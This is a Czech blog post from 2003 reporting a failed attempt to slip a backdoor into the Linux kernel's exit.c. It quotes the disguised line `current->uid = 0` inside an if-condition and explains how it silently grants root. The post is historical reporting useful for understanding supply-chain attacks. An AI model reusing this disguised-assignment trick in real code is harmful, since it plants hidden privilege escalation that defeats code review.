.    

POZOR! Tento článek byl naposledy aktualizován před více než dvěma lety!

Je možné, že následující­ stránka obsahuje odkazy, které dnes již nejsou funkční, nebo že některé informace uvedené v tomto článku se v průběhu času ukázaly jako prokazatelně chybné. Pokud jakoukoliv podobnou závadu zjistíte, tak neváhejte napsat co nejpřesnější popis závady do veřejného komentáře pod článkem: redakce TečkyCZ nové komentáře neustále sleduje, a to i pod těmi nejstaršími články. V celé řadě případů lze chyby snadno opravit - např. se stává, že video na YouTube bylo smazáno a znovu nahráno pod jiným id. V jiných případech někdo zase zakáže embedovaní videa, která přitom existuje ve více kopiích, nebo se z webu ztratí stránka umístěná na negarantovaném freehostingu, zatímco původní autor stránek si mezitím zaregistruje vlastní doménu, atd.

Děkujeme všem, kteří pomáhají opravovat chyby ve starších webových stránkách a udržují tak Internet naživu - redakce TečkyCZ.


V Linuxovém kernelu byl objeven pokus o backdoor

xChaos 6. listopadu 2003 [1716 znaků] [editováno 17. března 2006] [Linux a internet]
★★ [ + ] 2 [2x] [ - ]
Zobrazení 19256 ← Facebook 5 Twitter 4
Buďte první, kdo napíše kvalitní komentář k tomuto článku...

Vida, vida. Vývojáři Linuxového kernelu objevili pokus o vložení backdooru přímo do kernelu...
Na slashdotu se diskutuje o tom, že byl objeven pokus vložit kód pro backdoor (zadní vrátka) do otevřeného zdrojového kódu Linuxového kernelu.

Pokus to byl neúspěšný. Byl proveden jménem jednoho z registrovaných vývojářů. Pod záminkou kontroly některých příznaků ve funkci kernel/exit.c by došlo k nastavení rootovských privilegií pro právě běžící proces. Následující řádek kódu možná vejde do historie :-)

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

(Programátoři v C jistě dobře chápou, co udělá = místo == :-)

V diskuzi je zmíněno, že podobný backdoor v Interbase od Borlandu byl odhalen teprve po jejím uveřejnění jako open source. Backdoor byl ve všech verzích uveřejněných od roku 1994.

Pokus o backdoor v linuxovém jádře byl napsán celkem rafinovaně. Snažil se předstírat, že kontroluje určité příznaky, pokud je aktuální uživatel root - ale ve skutečnosti rootovská práva sám nastavoval. Nešlo ovšem v žádném případě o překlep - ale o rafinovaný pokus backdoor do kódu vložit. Vyskytly se dokonce hlasy, že to je až příliš rafinované na to, aby pokus přišel ze strany Microsoftu :-)

No, diskuze o tomto tématu je celkem nadprůměrně vtipná, plná sofistikovaných narážek na soudní spor s SCO, monolitické kernely obecně, legálnost podobných pokusů, úvahy o tom, zda nejde o propagaci proprietárního správce projektů BitKeeper na úkor open source CVS, apod. Pokud neumíte anglicky, asi byste měli začít uvažovat o tom že si předplatíte výtah z diskuzí ze Slashdotu přeložený do češtiny - případné finanční nabídky prosím zaílejte autorovi tohoto článku ;-)


Sloupcová sazba: pokud je okno prohlížeče dostatečně velké (na monitoru s dostatečným rozlišením), zobrazí se článek ve více sloupcích (w3.org). Testováno v browserech Firefox, Opera a Chrome. Není implementováno v Internet Exploreru. Tato feature může způsobovat problémy ve starších verzích prohlížečů s jádrem Webkit (Google Chrome, Safari, Konqueror). Pokud nevidíte článek celý, zkuste zmenšit okno prohlížeče nebo použít verzi pro tisk. [zpět na začátek sloupcové sazby]
Pokud se vám článek líbil, zkuste autora podpořit [zobrazit možnosti]
Sdílet v síti [Identi.ca - musíte být předem přihlášeni] [Twitter] [Facebook] [Jagg.cz]
Formátovat pro tisk [bez komentářů] [s komentáři]
Krátká forma URL (adresy) [http://teckacz.cz/148]
Všechny články [od autora xChaos] [v rubrice Linux a internet] [nejnovější]

Hodnocení článku čtenáři [ + ] 2 [2x] [ - ]
Tip: Pro moderaci článků (kladné nebo záporné hodnocení) je nutné použít browser, který podporuje javascript a cookies.
Počet zobrazených komentářů: 0 [celkový čas potřebný k prohledání databáze a vytvoření stránky: 0.22 sekund]

Pozor, vložením komentáře souhlasíte s pravidly hry TečkyCZ! [zobrazit pravidla] →
Ochrana proti spambotům - tři-krát-tři je ... ? (napište číslicí - nemělo by byt potřeba při zapnutém JavaScriptu)
Sociální síť (přihlaste se předem, 1. řádek<=96 znaků=status, zbytek=odkaz)
Offtopic resolver (týká se odpověď původního tématu, nebo patří jinam?)
Přezdívka (povinně) - nepoužívejte speciální znaky, mezery=podtržítka
E-mail (volitelně) - nebude zobrazen, zobrazí se ikonka z [www.gravatar.com]

Nelze použít HTML [zobrazit mikrosyntax] →

Nápověda: ve vlastním zájmu uvádějte u komentářů pouze funkční a dostupnou e-mailovou adresu. Přezdívku, která je jednou spojená s konkrétní e-mailovou adresou, už nyní nelze bez zásahu administrátora serveru spojit s jinou adresou. Uvedením neplatné e-mailové adresy si v budoucnu znemožníte upload ikonky i možnost použít některé další chystané neanonymní funkce vázané na uvedení platné e-mailové adresy.


TečkaCZ [Nejnovější články] [Nejnovější komentáře] [Zeď vzkazů] [Zeď odkazů] [Začátek článku]

    TečkaCZ
  •  
  • Komentáře →
  • Nástěnky →
  • Debaty →
  • Články →
  • Ročníky →
  • Rubriky →
  • RSS kanály →
  • Vzhled →
  • Ostatní →
  •  
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] []
  •  
.

[Arachne Labs]

[SPOJE.NET]

[Právě dnes | Tech | Ostatní]

Yacy P2P web search jabber.arachne.cz
tiskové zprávy a otevřené dopisy přebíráme z nejrůznějších informačních kanálů (i bez výslovného souhlasu autorů)
licenční práva k použitým obrázkům a grafickým motivům nejsou definována (přebírejte pouze texty bez obrázků)
texty článků i komentáře bez uvedení copyrightu jsou chráněny GNU Free Documentation License
založeno na Quzo engine, (G)1999-2002 David Čermák, (G)2002-2012 Michael Polák
Quzo engine vyvíjejí Arachne Labs, webhosting sponzorují SPOJE.NET
seznam aktuálních článků je dostupný i ve formátu RSS (XML)
můžete také sledovat Twitter feed TečkyCZ.
test XHTML a CSS2 validity